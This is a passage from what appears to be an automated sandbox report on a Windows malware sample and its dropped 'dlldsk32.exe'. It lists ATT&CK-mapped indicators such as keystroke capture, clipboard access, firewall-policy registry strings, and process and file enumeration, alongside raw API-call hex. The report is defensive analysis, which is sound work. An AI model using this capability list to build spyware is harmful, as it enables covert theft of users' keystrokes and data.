1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00781e26000000000042000042340000c0a020260010f02600d8a323001002000000001d0040000000781e2600fcda12000464c47738011d00e063c4779f51ff770000000000001d00801e26006dd1f2764fc0cdd86cae0f7700000000000000001003000010f02600d82f1d000100000000001d0050011d000c000000801e2600d82f1d00020000021800000013050016860000000000000000000000030000009cda12008600000093040000000000001b22003906000000c075fa76100f280000000000c075fa76b8da12008c301d0000000000d82f1d0010db1200ff2bc477 (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00000000007601007780ef120038c42f00c4002d00c4002d00b007000000002d0001000000e0c32f0070f012000464c47738012d00e063c477f567ff770000000000002d00e8c32f0000002d001e000001f0ee12000000000084f0120095e1c077c4002d00b82f2d00435cc47700002d00240000000300010008000000b8ee1200000000000400010004000000ccee120000000000e738c477030000009967ff7780010000d0f0120044f11200f4ef12000001000090f01200c4002d00f58f2900feffffffec38c4773dd1f27600000000b82f2d00b430420000000000e8c32f00 (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-415", "type": 2, "relevance": 1, "name": "Found registry location string related to firewall policy", "description": "Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"IsWow64Process\" with parameter \"4816\" - (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"IsWow64Process\" with parameter \"5072\" - (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-688", "type": 2, "relevance": 1, "name": "Able to find string content in a file", "description": "Found string \"findstr.exe\" (Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-430", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system network configuration", "description": "Found string \"tracert.exe\" (Indicator: \"tracert\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2767.BAT\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2767.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-237", "type": 2, "relevance": 1, "name": "Contains ability to retrieve event logs (API string)", "description": "Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"3684169662,5216,3118,,CreateToolhelp32Snapshot,kernel32.dll,\"252:21:41.321\",RX=0,PX=0\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp, 00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")\n Found reference to API \"10607181291,4932,3122,,Process32NextW,kernel32.dll,\"252:21:44.207\",RX=0,PX=0\" (Indicator: \"Process32Next\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API \"17495527290,4932,3122,,Process32NextW,kernel32.dll,\"252:21:47.078\",RX=0,PX=0\" (Indicator: \"Process32Next\"; Source: \"00000000-00004816.00000001.139308.0026A000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"6118536879,4552,3117,,FindNextFileW,kernel32.dll,\"252:21:42.335\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-188", "type": 2, "relevance": 1, "name": "Contains ability to access clipboard data (API string)", "description": "Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\*.* (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter 0409 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter 12520437.cpx (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter 12520850.cpx (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter aaclient.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter acmigration.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter acppage.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter acproxy.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter ActionCenter.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter ActionCenterCPL.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter ActionQueue.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter activeds.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter activeds.tlb (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter actxprxy.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter AdapterTroubleshooter.exe (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter AdmTmpl.dll (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter Adobe (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"FindNextFileW\" with parameter adprovider.dll (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-224", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the local name for a socket (API string)", "description": "Found reference to API \"getsockname\" (Indicator: \"getsockname\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-532", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host name of a computer (API string)", "description": "Found reference to API \"gethostname\" (Indicator: \"gethostname\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"2160251256,5176,3024,,RtlGetVersion,NTDLL.dll,\"252:21:43.396\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00005072.00000000.139283.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": 